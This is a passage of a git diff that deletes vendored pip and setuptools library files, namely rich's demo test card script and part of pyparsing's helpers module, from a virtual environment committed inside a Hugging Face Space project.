                \ No newline at end of file diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py deleted file mode 100644 index 54e6d5e8ab2dceaba2a738d886ffa4129952bbb0..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py +++ /dev/null @@ -1,282 +0,0 @@ -import colorsys -import io -from time import process_time - -from pip._vendor.rich import box -from pip._vendor.rich.color import Color -from pip._vendor.rich.console import Console, ConsoleOptions, Group, RenderableType, RenderResult -from pip._vendor.rich.markdown import Markdown -from pip._vendor.rich.measure import Measurement -from pip._vendor.rich.pretty import Pretty -from pip._vendor.rich.segment import Segment -from pip._vendor.rich.style import Style -from pip._vendor.rich.syntax import Syntax -from pip._vendor.rich.table import Table -from pip._vendor.rich.text import Text - - -class ColorBox: - def __rich_console__( - self, console: Console, options: ConsoleOptions - ) -> RenderResult: - for y in range(0, 5): - for x in range(options.max_width): - h = x / options.max_width - l = 0.1 + ((y / 5) * 0.7) - r1, g1, b1 = colorsys.hls_to_rgb(h, l, 1.0) - r2, g2, b2 = colorsys.hls_to_rgb(h, l + 0.7 / 10, 1.0) - bgcolor = Color.from_rgb(r1 * 255, g1 * 255, b1 * 255) - color = Color.from_rgb(r2 * 255, g2 * 255, b2 * 255) - yield Segment("▄", Style(color=color, bgcolor=bgcolor)) - yield Segment.line() - - def __rich_measure__( - self, console: "Console", options: ConsoleOptions - ) -> Measurement: - return Measurement(1, options.max_width) - - -def make_test_card() -> Table: - """Get a renderable that demonstrates a number of features.""" - table = Table.grid(padding=1, pad_edge=True) - table.title = "Rich features" - table.add_column("Feature", no_wrap=True, 
justify="center", style="bold red") - table.add_column("Demonstration") - - color_table = Table( - box=None, - expand=False, - show_header=False, - show_edge=False, - pad_edge=False, - ) - color_table.add_row( - ( - "✓ [bold green]4-bit color[/]\n" - "✓ [bold blue]8-bit color[/]\n" - "✓ [bold magenta]Truecolor (16.7 million)[/]\n" - "✓ [bold yellow]Dumb terminals[/]\n" - "✓ [bold cyan]Automatic color conversion" - ), - ColorBox(), - ) - - table.add_row("Colors", color_table) - - table.add_row( - "Styles", - "All ansi styles: [bold]bold[/], [dim]dim[/], [italic]italic[/italic], [underline]underline[/], [strike]strikethrough[/], [reverse]reverse[/], and even [blink]blink[/].", - ) - - lorem = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque in metus sed sapien ultricies pretium a at justo. Maecenas luctus velit et auctor maximus." - lorem_table = Table.grid(padding=1, collapse_padding=True) - lorem_table.pad_edge = False - lorem_table.add_row( - Text(lorem, justify="left", style="green"), - Text(lorem, justify="center", style="yellow"), - Text(lorem, justify="right", style="blue"), - Text(lorem, justify="full", style="red"), - ) - table.add_row( - "Text", - Group( - Text.from_markup( - """Word wrap text. Justify [green]left[/], [yellow]center[/], [blue]right[/] or [red]full[/].\n""" - ), - lorem_table, - ), - ) - - def comparison(renderable1: RenderableType, renderable2: RenderableType) -> Table: - table = Table(show_header=False, pad_edge=False, box=None, expand=True) - table.add_column("1", ratio=1) - table.add_column("2", ratio=1) - table.add_row(renderable1, renderable2) - return table - - table.add_row( - "Asian\nlanguage\nsupport", - ":flag_for_china: 该库支持中文,日文和韩文文本!\n:flag_for_japan: ライブラリは中国語、日本語、韓国語のテキストをサポートしています\n:flag_for_south_korea: 이 라이브러리는 중국어, 일본어 및 한국어 텍스트를 지원합니다", - ) - - markup_example = ( - "[bold magenta]Rich[/] supports a simple [i]bbcode[/i]-like [b]markup[/b] for [yellow]color[/], [underline]style[/], and emoji! 
" - ":+1: :apple: :ant: :bear: :baguette_bread: :bus: " - ) - table.add_row("Markup", markup_example) - - example_table = Table( - show_edge=False, - show_header=True, - expand=False, - row_styles=["none", "dim"], - box=box.SIMPLE, - ) - example_table.add_column("[green]Date", style="green", no_wrap=True) - example_table.add_column("[blue]Title", style="blue") - example_table.add_column( - "[cyan]Production Budget", - style="cyan", - justify="right", - no_wrap=True, - ) - example_table.add_column( - "[magenta]Box Office", - style="magenta", - justify="right", - no_wrap=True, - ) - example_table.add_row( - "Dec 20, 2019", - "Star Wars: The Rise of Skywalker", - "$275,000,000", - "$375,126,118", - ) - example_table.add_row( - "May 25, 2018", - "[b]Solo[/]: A Star Wars Story", - "$275,000,000", - "$393,151,347", - ) - example_table.add_row( - "Dec 15, 2017", - "Star Wars Ep. VIII: The Last Jedi", - "$262,000,000", - "[bold]$1,332,539,889[/bold]", - ) - example_table.add_row( - "May 19, 1999", - "Star Wars Ep. [b]I[/b]: [i]The phantom Menace", - "$115,000,000", - "$1,027,044,677", - ) - - table.add_row("Tables", example_table) - - code = '''\ -def iter_last(values: Iterable[T]) -> Iterable[Tuple[bool, T]]: - """Iterate and generate a tuple with a flag for last value.""" - iter_values = iter(values) - try: - previous_value = next(iter_values) - except StopIteration: - return - for value in iter_values: - yield False, previous_value - previous_value = value - yield True, previous_value''' - - pretty_data = { - "foo": [ - 3.1427, - ( - "Paul Atreides", - "Vladimir Harkonnen", - "Thufir Hawat", - ), - ], - "atomic": (False, True, None), - } - table.add_row( - "Syntax\nhighlighting\n&\npretty\nprinting", - comparison( - Syntax(code, "python3", line_numbers=True, indent_guides=True), - Pretty(pretty_data, indent_guides=True), - ), - ) - - markdown_example = """\ -# Markdown - -Supports much of the *markdown* __syntax__! 
- -- Headers -- Basic formatting: **bold**, *italic*, `code` -- Block quotes -- Lists, and more... - """ - table.add_row( - "Markdown", comparison("[cyan]" + markdown_example, Markdown(markdown_example)) - ) - - table.add_row( - "+more!", - """Progress bars, columns, styled logging handler, tracebacks, etc...""", - ) - return table - - -if __name__ == "__main__": # pragma: no cover - - console = Console( - file=io.StringIO(), - force_terminal=True, - ) - test_card = make_test_card() - - # Print once to warm cache - start = process_time() - console.print(test_card) - pre_cache_taken = round((process_time() - start) * 1000.0, 1) - - console.file = io.StringIO() - - start = process_time() - console.print(test_card) - taken = round((process_time() - start) * 1000.0, 1) - - c = Console(record=True) - c.print(test_card) - # c.save_svg( - # path="/Users/darrenburns/Library/Application Support/JetBrains/PyCharm2021.3/scratches/svg_export.svg", - # title="Rich can export to SVG", - # ) - - print(f"rendered in {pre_cache_taken}ms (cold cache)") - print(f"rendered in {taken}ms (warm cache)") - - from pip._vendor.rich.panel import Panel - - console = Console() - - sponsor_message = Table.grid(padding=1) - sponsor_message.add_column(style="green", justify="right") - sponsor_message.add_column(no_wrap=True) - - sponsor_message.add_row( - "Textualize", - "[u blue link=https://github.com/textualize]https://github.com/textualize", - ) - sponsor_message.add_row( - "Buy devs a :coffee:", - "[u blue link=https://ko-fi.com/textualize]https://ko-fi.com/textualize", - ) - sponsor_message.add_row( - "Twitter", - "[u blue link=https://twitter.com/willmcgugan]https://twitter.com/willmcgugan", - ) - - intro_message = Text.from_markup( - """\ -We hope you enjoy using Rich! 
- -Rich is maintained with [red]:heart:[/] by [link=https://www.textualize.io]Textualize.io[/] - -- Will McGugan""" - ) - - message = Table.grid(padding=2) - message.add_column() - message.add_column(no_wrap=True) - message.add_row(intro_message, sponsor_message) - - console.print( - Panel.fit( - message, - box=box.ROUNDED, - padding=(1, 2), - title="[b red]Thanks for trying out Rich!", - border_style="bright_blue", - ), - justify="center", - ) diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py deleted file mode 100644 index be8a3657884806a8e7bf5e8e338b3fc86eeffa5b..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py +++ /dev/null @@ -1,1083 +0,0 @@ -# helpers.py -import html.entities -import re - -from . import __diag__ -from .core import * -from .util import _bslash, _flatten, _escape_regex_range_chars - - -# -# global helpers -# -def delimited_list( - expr: Union[str, ParserElement], - delim: Union[str, ParserElement] = ",", - combine: bool = False, - min: OptionalType[int] = None, - max: OptionalType[int] = None, - *, - allow_trailing_delim: bool = False, -) -> ParserElement: - """Helper to define a delimited list of expressions - the delimiter - defaults to ','. By default, the list elements and delimiters can - have intervening whitespace, and comments, but this can be - overridden by passing ``combine=True`` in the constructor. If - ``combine`` is set to ``True``, the matching tokens are - returned as a single token string, with the delimiters included; - otherwise, the matching tokens are returned as a list of tokens, - with the delimiters suppressed. - - If ``allow_trailing_delim`` is set to True, then the list may end with - a delimiter. 
- - Example:: - - delimited_list(Word(alphas)).parse_string("aa,bb,cc") # -> ['aa', 'bb', 'cc'] - delimited_list(Word(hexnums), delim=':', combine=True).parse_string("AA:BB:CC:DD:EE") # -> ['AA:BB:CC:DD:EE'] - """ - if isinstance(expr, str_type): - expr = ParserElement._literalStringClass(expr) - - dlName = "{expr} [{delim} {expr}]...{end}".format( - expr=str(expr.copy().streamline()), - delim=str(delim), - end=" [{}]".format(str(delim)) if allow_trailing_delim else "", - ) - - if not combine: - delim = Suppress(delim) - - if min is not None: - if min < 1: - raise ValueError("min must be greater than 0") - min -= 1 - if max is not None: - if min is not None and max <= min: - raise ValueError("max must be greater than, or equal to min") - max -= 1 - delimited_list_expr = expr + (delim + expr)[min, max] - - if allow_trailing_delim: - delimited_list_expr += Opt(delim) - - if combine: - return Combine(delimited_list_expr).set_name(dlName) - else: - return delimited_list_expr.set_name(dlName) - - -def counted_array( - expr: ParserElement, - int_expr: OptionalType[ParserElement] = None, - *, - intExpr: OptionalType[ParserElement] = None, -) -> ParserElement: - """Helper to define a counted list of expressions. - - This helper defines a pattern of the form:: - - integer expr expr expr... - - where the leading integer tells how many expr expressions follow. - The matched tokens returns the array of expr tokens as a list - the - leading count token is suppressed. - - If ``int_expr`` is specified, it should be a pyparsing expression - that produces an integer value. 
- - Example:: - - counted_array(Word(alphas)).parse_string('2 ab cd ef') # -> ['ab', 'cd'] - - # in this parser, the leading integer value is given in binary, - # '10' indicating that 2 values are in the array - binary_constant = Word('01').set_parse_action(lambda t: int(t[0], 2)) - counted_array(Word(alphas), int_expr=binary_constant).parse_string('10 ab cd ef') # -> ['ab', 'cd'] - - # if other fields must be parsed after the count but before the - # list items, give the fields results names and they will - # be preserved in the returned ParseResults: - count_with_metadata = integer + Word(alphas)("type") - typed_array = counted_array(Word(alphanums), int_expr=count_with_metadata)("items") - result = typed_array.parse_string("3 bool True True False") - print(result.dump()) - - # prints - # ['True', 'True', 'False'] - # - items: ['True', 'True', 'False'] - # - type: 'bool' - """ - intExpr = intExpr or int_expr - array_expr = Forward() - - def count_field_parse_action(s, l, t): - nonlocal array_expr - n = t[0] - array_expr <<= (expr * n) if n else Empty() - # clear list contents, but keep any named results - del t[:] - - if intExpr is None: - intExpr = Word(nums).set_parse_action(lambda t: int(t[0])) - else: - intExpr = intExpr.copy() - intExpr.set_name("arrayLen") - intExpr.add_parse_action(count_field_parse_action, call_during_try=True) - return (intExpr + array_expr).set_name("(len) " + str(expr) + "...") - - -def match_previous_literal(expr: ParserElement) -> ParserElement: - """Helper to define an expression that is indirectly defined from - the tokens matched in a previous expression, that is, it looks for - a 'repeat' of a previous expression. For example:: - - first = Word(nums) - second = match_previous_literal(first) - match_expr = first + ":" + second - - will match ``"1:1"``, but not ``"1:2"``. Because this - matches a previous literal, will also match the leading - ``"1:1"`` in ``"1:10"``. If this is not desired, use - :class:`match_previous_expr`. 
Do *not* use with packrat parsing - enabled. - """ - rep = Forward() - - def copy_token_to_repeater(s, l, t): - if t: - if len(t) == 1: - rep << t[0] - else: - # flatten t tokens - tflat = _flatten(t.as_list()) - rep << And(Literal(tt) for tt in tflat) - else: - rep << Empty() - - expr.add_parse_action(copy_token_to_repeater, callDuringTry=True) - rep.set_name("(prev) " + str(expr)) - return rep - - -def match_previous_expr(expr: ParserElement) -> ParserElement: - """Helper to define an expression that is indirectly defined from - the tokens matched in a previous expression, that is, it looks for - a 'repeat' of a previous expression. For example:: - - first = Word(nums) - second = match_previous_expr(first) - match_expr = first + ":" + second - - will match ``"1:1"``, but not ``"1:2"``. Because this - matches by expressions, will *not* match the leading ``"1:1"`` - in ``"1:10"``; the expressions are evaluated first, and then - compared, so ``"1"`` is compared with ``"10"``. Do *not* use - with packrat parsing enabled. 
- """ - rep = Forward() - e2 = expr.copy() - rep <<= e2 - - def copy_token_to_repeater(s, l, t): - matchTokens = _flatten(t.as_list()) - - def must_match_these_tokens(s, l, t): - theseTokens = _flatten(t.as_list()) - if theseTokens != matchTokens: - raise ParseException( - s, l, "Expected {}, found{}".format(matchTokens, theseTokens) - ) - - rep.set_parse_action(must_match_these_tokens, callDuringTry=True) - - expr.add_parse_action(copy_token_to_repeater, callDuringTry=True) - rep.set_name("(prev) " + str(expr)) - return rep - - -def one_of( - strs: Union[IterableType[str], str], - caseless: bool = False, - use_regex: bool = True, - as_keyword: bool = False, - *, - useRegex: bool = True, - asKeyword: bool = False, -) -> ParserElement: - """Helper to quickly define a set of alternative :class:`Literal` s, - and makes sure to do longest-first testing when there is a conflict, - regardless of the input order, but returns - a :class:`MatchFirst` for best performance. - - Parameters: - - - ``strs`` - a string of space-delimited literals, or a collection of - string literals - - ``caseless`` - treat all literals as caseless - (default= ``False``) - - ``use_regex`` - as an optimization, will - generate a :class:`Regex` object; otherwise, will generate - a :class:`MatchFirst` object (if ``caseless=True`` or ``asKeyword=True``, or if - creating a :class:`Regex` raises an exception) - (default= ``True``) - - ``as_keyword`` - enforce :class:`Keyword`-style matching on the - generated expressions - (default= ``False``) - - ``asKeyword`` and ``useRegex`` are retained for pre-PEP8 compatibility, - but will be removed in a future release - - Example:: - - comp_oper = one_of("< = > <= >= !=") - var = Word(alphas) - number = Word(nums) - term = var | number - comparison_expr = term + comp_oper + term - print(comparison_expr.search_string("B = 12 AA=23 B<=AA AA>12")) - - prints:: - - [['B', '=', '12'], ['AA', '=', '23'], ['B', '<=', 'AA'], ['AA', '>', '12']] - """ - asKeyword = 
asKeyword or as_keyword - useRegex = useRegex and use_regex - - if ( - isinstance(caseless, str_type) - and __diag__.warn_on_multiple_string_args_to_oneof - ): - warnings.warn( - "More than one string argument passed to one_of, pass" - " choices as a list or space-delimited string", - stacklevel=2, - ) - - if caseless: - isequal = lambda a, b: a.upper() == b.upper() - masks = lambda a, b: b.upper().startswith(a.upper()) - parseElementClass = CaselessKeyword if asKeyword else CaselessLiteral - else: - isequal = lambda a, b: a == b - masks = lambda a, b: b.startswith(a) - parseElementClass = Keyword if asKeyword else Literal - - symbols: List[str] = [] - if isinstance(strs, str_type): - symbols = strs.split() - elif isinstance(strs, Iterable): - symbols = list(strs) - else: - raise TypeError("Invalid argument to one_of, expected string or iterable") - if not symbols: - return NoMatch() - - # reorder given symbols to take care to avoid masking longer choices with shorter ones - # (but only if the given symbols are not just single characters) - if any(len(sym) > 1 for sym in symbols): - i = 0 - while i < len(symbols) - 1: - cur = symbols[i] - for j, other in enumerate(symbols[i + 1 :]): - if isequal(other, cur): - del symbols[i + j + 1] - break - elif masks(cur, other): - del symbols[i + j + 1] - symbols.insert(i, other) - break - else: - i += 1 - - if useRegex: - re_flags: int = re.IGNORECASE if caseless else 0 - - try: - if all(len(sym) == 1 for sym in symbols): - # symbols are just single characters, create range regex pattern - patt = "[{}]".format( - "".join(_escape_regex_range_chars(sym) for sym in symbols) - ) - else: - patt = "|".join(re.escape(sym) for sym in symbols) - - # wrap with \b word break markers if defining as keywords - if asKeyword: - patt = r"\b(?:{})\b".format(patt) - - ret = Regex(patt, flags=re_flags).set_name(" | ".join(symbols)) - - if caseless: - # add parse action to return symbols as specified, not in random - # casing as found in input 
string - symbol_map = {sym.lower(): sym for sym in symbols} - ret.add_parse_action(lambda s, l, t: symbol_map[t[0].lower()]) - - return ret - - except re.error: - warnings.warn( - "Exception creating Regex for one_of, building MatchFirst", stacklevel=2 - ) - - # last resort, just use MatchFirst - return MatchFirst(parseElementClass(sym) for sym in symbols).set_name( - " | ".join(symbols) - ) - - -def dict_of(key: ParserElement, value: ParserElement) -> ParserElement: - """Helper to easily and clearly define a dictionary by specifying - the respective patterns for the key and value. Takes care of - defining the :class:`Dict`, :class:`ZeroOrMore`, and - :class:`Group` tokens in the proper order. The key pattern - can include delimiting markers or punctuation, as long as they are - suppressed, thereby leaving the significant key text. The value - pattern can include named results, so that the :class:`Dict` results - can include named token fields. - - Example:: - - text = "shape: SQUARE posn: upper left color: light blue texture: burlap" - attr_expr = (label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join)) - print(OneOrMore(attr_expr).parse_string(text).dump()) - - attr_label = label - attr_value = Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join) - - # similar to Dict, but simpler call format - result = dict_of(attr_label, attr_value).parse_string(text) - print(result.dump()) - print(result['shape']) - print(result.shape) # object attribute access works too - print(result.as_dict()) - - prints:: - - [['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'light blue'], ['texture', 'burlap']] - - color: 'light blue' - - posn: 'upper left' - - shape: 'SQUARE' - - texture: 'burlap' - SQUARE - SQUARE - {'color': 'light blue', 'shape': 'SQUARE', 'posn': 'upper left', 'texture': 'burlap'} - """ - return Dict(OneOrMore(Group(key + value))) - - -def original_text_for( - expr: ParserElement, as_string: bool = True, 
*, asString: bool = True -) -> ParserElement: - """Helper to return the original, untokenized text for a given - expression. Useful to restore the parsed fields of an HTML start - tag into the raw tag text itself, or to revert separate tokens with - intervening whitespace back to the original matching input text. By - default, returns astring containing the original parsed text. - - If the optional ``as_string`` argument is passed as - ``False``, then the return value is - a :class:`ParseResults` containing any results names that - were originally matched, and a single token containing the original - matched text from the input string. So if the expression passed to - :class:`original_text_for` contains expressions with defined - results names, you must set ``as_string`` to ``False`` if you - want to preserve those results name values. - - The ``asString`` pre-PEP8 argument is retained for compatibility, - but will be removed in a future release. - - Example:: - - src = "this is test bold text normal text " - for tag in ("b", "i"): - opener, closer = make_html_tags(tag) - patt = original_text_for(opener + SkipTo(closer) + closer) - print(patt.search_string(src)[0]) - - prints:: - - [' bold text '] - ['text'] - """ - asString = asString and as_string - - locMarker = Empty().set_parse_action(lambda s, loc, t: loc) - endlocMarker = locMarker.copy() - endlocMarker.callPreparse = False - matchExpr = locMarker("_original_start") + expr + endlocMarker("_original_end") - if asString: - extractText = lambda s, l, t: s[t._original_start : t._original_end] - else: - - def extractText(s, l, t): - t[:] = [s[t.pop("_original_start") : t.pop("_original_end")]] - - matchExpr.set_parse_action(extractText) - matchExpr.ignoreExprs = expr.ignoreExprs - matchExpr.suppress_warning(Diagnostics.warn_ungrouped_named_tokens_in_collection) - return matchExpr - - -def ungroup(expr: ParserElement) -> ParserElement: - """Helper to undo pyparsing's default grouping of And expressions, - even if 
all but one are non-empty. - """ - return TokenConverter(expr).add_parse_action(lambda t: t[0]) - - -def locatedExpr(expr: ParserElement) -> ParserElement: - """ - (DEPRECATED - future code should use the Located class) - Helper to decorate a returned token with its starting and ending - locations in the input string. - - This helper adds the following results names: - - - ``locn_start`` - location where matched expression begins - - ``locn_end`` - location where matched expression ends - - ``value`` - the actual parsed results - - Be careful if the input text contains ```` characters, you - may want to call :class:`ParserElement.parseWithTabs` - - Example:: - - wd = Word(alphas) - for match in locatedExpr(wd).searchString("ljsdf123lksdjjf123lkkjj1222"): - print(match) - - prints:: - - [[0, 'ljsdf', 5]] - [[8, 'lksdjjf', 15]] - [[18, 'lkkjj', 23]] - """ - locator = Empty().set_parse_action(lambda ss, ll, tt: ll) - return Group( - locator("locn_start") - + expr("value") - + locator.copy().leaveWhitespace()("locn_end") - ) - - -def nested_expr( - opener: Union[str, ParserElement] = "(", - closer: Union[str, ParserElement] = ")", - content: OptionalType[ParserElement] = None, - ignore_expr: ParserElement = quoted_string(), - *, - ignoreExpr: ParserElement = quoted_string(), -) -> ParserElement: - """Helper method for defining nested lists enclosed in opening and - closing delimiters (``"("`` and ``")"`` are the default). 
- - Parameters: - - ``opener`` - opening character for a nested list - (default= ``"("``); can also be a pyparsing expression - - ``closer`` - closing character for a nested list - (default= ``")"``); can also be a pyparsing expression - - ``content`` - expression for items within the nested lists - (default= ``None``) - - ``ignore_expr`` - expression for ignoring opening and closing delimiters - (default= :class:`quoted_string`) - - ``ignoreExpr`` - this pre-PEP8 argument is retained for compatibility - but will be removed in a future release - - If an expression is not provided for the content argument, the - nested expression will capture all whitespace-delimited content - between delimiters as a list of separate values. - - Use the ``ignore_expr`` argument to define expressions that may - contain opening or closing characters that should not be treated as - opening or closing characters for nesting, such as quoted_string or - a comment expression. Specify multiple expressions using an - :class:`Or` or :class:`MatchFirst`. The default is - :class:`quoted_string`, but if no expressions are to be ignored, then - pass ``None`` for this argument. 
- - Example:: - - data_type = one_of("void int short long char float double") - decl_data_type = Combine(data_type + Opt(Word('*'))) - ident = Word(alphas+'_', alphanums+'_') - number = pyparsing_common.number - arg = Group(decl_data_type + ident) - LPAR, RPAR = map(Suppress, "()") - - code_body = nested_expr('{', '}', ignore_expr=(quoted_string | c_style_comment)) - - c_function = (decl_data_type("type") - + ident("name") - + LPAR + Opt(delimited_list(arg), [])("args") + RPAR - + code_body("body")) - c_function.ignore(c_style_comment) - - source_code = ''' - int is_odd(int x) { - return (x%2); - } - - int dec_to_hex(char hchar) { - if (hchar >= '0' && hchar <= '9') { - return (ord(hchar)-ord('0')); - } else { - return (10+ord(hchar)-ord('A')); - } - } - ''' - for func in c_function.search_string(source_code): - print("%(name)s (%(type)s) args: %(args)s" % func) - - - prints:: - - is_odd (int) args: [['int', 'x']] - dec_to_hex (int) args: [['char', 'hchar']] - """ - if ignoreExpr != ignore_expr: - ignoreExpr = ignore_expr if ignoreExpr == quoted_string() else ignoreExpr - if opener == closer: - raise ValueError("opening and closing strings cannot be the same") - if content is None: - if isinstance(opener, str_type) and isinstance(closer, str_type): - if len(opener) == 1 and len(closer) == 1: - if ignoreExpr is not None: - content = Combine( - OneOrMore( - ~ignoreExpr - + CharsNotIn( - opener + closer + ParserElement.DEFAULT_WHITE_CHARS, - exact=1, - ) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - content = empty.copy() + CharsNotIn( - opener + closer + ParserElement.DEFAULT_WHITE_CHARS - ).set_parse_action(lambda t: t[0].strip()) - else: - if ignoreExpr is not None: - content = Combine( - OneOrMore( - ~ignoreExpr - + ~Literal(opener) - + ~Literal(closer) - + CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS, exact=1) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - content = Combine( - OneOrMore( - ~Literal(opener) - + ~Literal(closer) - + 
CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS, exact=1) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - raise ValueError( - "opening and closing arguments must be strings if no content expression is given" - ) - ret = Forward() - if ignoreExpr is not None: - ret <<= Group( - Suppress(opener) + ZeroOrMore(ignoreExpr | ret | content) + Suppress(closer) - ) - else: - ret <<= Group(Suppress(opener) + ZeroOrMore(ret | content) + Suppress(closer)) - ret.set_name("nested %s%s expression" % (opener, closer)) - return ret - - -def _makeTags(tagStr, xml, suppress_LT=Suppress("<"), suppress_GT=Suppress(">")): - """Internal helper to construct opening and closing tag expressions, given a tag name""" - if isinstance(tagStr, str_type): - resname = tagStr - tagStr = Keyword(tagStr, caseless=not xml) - else: - resname = tagStr.name - - tagAttrName = Word(alphas, alphanums + "_-:") - if xml: - tagAttrValue = dbl_quoted_string.copy().set_parse_action(remove_quotes) - openTag = ( - suppress_LT - + tagStr("tag") - + Dict(ZeroOrMore(Group(tagAttrName + Suppress("=") + tagAttrValue))) - + Opt("/", default=[False])("empty").set_parse_action( - lambda s, l, t: t[0] == "/" - ) - + suppress_GT - ) - else: - tagAttrValue = quoted_string.copy().set_parse_action(remove_quotes) | Word( - printables, exclude_chars=">" - ) - openTag = ( - suppress_LT - + tagStr("tag") - + Dict( - ZeroOrMore( - Group( - tagAttrName.set_parse_action(lambda t: t[0].lower()) - + Opt(Suppress("=") + tagAttrValue) - ) - ) - ) - + Opt("/", default=[False])("empty").set_parse_action( - lambda s, l, t: t[0] == "/" - ) - + suppress_GT - ) - closeTag = Combine(Literal("", adjacent=False) - - openTag.set_name("<%s>" % resname) - # add start results name in parse action now that ungrouped names are not reported at two levels - openTag.add_parse_action( - lambda t: t.__setitem__( - "start" + "".join(resname.replace(":", " ").title().split()), t.copy() - ) - ) - closeTag = closeTag( - "end" + 
"".join(resname.replace(":", " ").title().split()) - ).set_name("" % resname) - openTag.tag = resname - closeTag.tag = resname - openTag.tag_body = SkipTo(closeTag()) - return openTag, closeTag - - -def make_html_tags( - tag_str: Union[str, ParserElement] -) -> Tuple[ParserElement, ParserElement]: - """Helper to construct opening and closing tag expressions for HTML, - given a tag name. Matches tags in either upper or lower case, - attributes with namespaces and with quoted or unquoted values. - - Example:: - - text = '
    More info at the pyparsing wiki page